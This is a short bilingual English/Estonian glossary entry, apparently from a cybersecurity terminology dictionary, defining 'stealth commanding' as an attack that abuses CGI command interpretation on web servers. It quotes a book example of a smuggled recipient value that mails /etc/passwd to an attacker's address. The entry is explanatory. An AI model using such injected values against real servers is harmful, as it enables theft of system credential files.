AKIT
English Eesti

stealth commanding

peitkäskrünne

olemus
rünne veebiserveri kaudu:
- suunatud veebiserverit majutavale operatsioonisüsteemile
- põhineb CGI-käskude ja päringute tõlgendamise nõrkustel
------ näiteks Perli käskudega eval ja system

täpsemalt
https://www.imperva.com/Resources/Glossary/stealth-commanding

näide
raamatust Cybersecurity Operations Handbook:
- server küsib kasutajalt teabe saatmiseks meiliaadressi ja
- selle skriptis on käsk open (MAIL, "|$mailprog $recipient")
- väljale $recipient paigutab ründaja
------ "joehacker @ nefariousways.org</etc/passwd",
------ lastes oma aadressile saata paroolifaili

vt ka
- käsusüst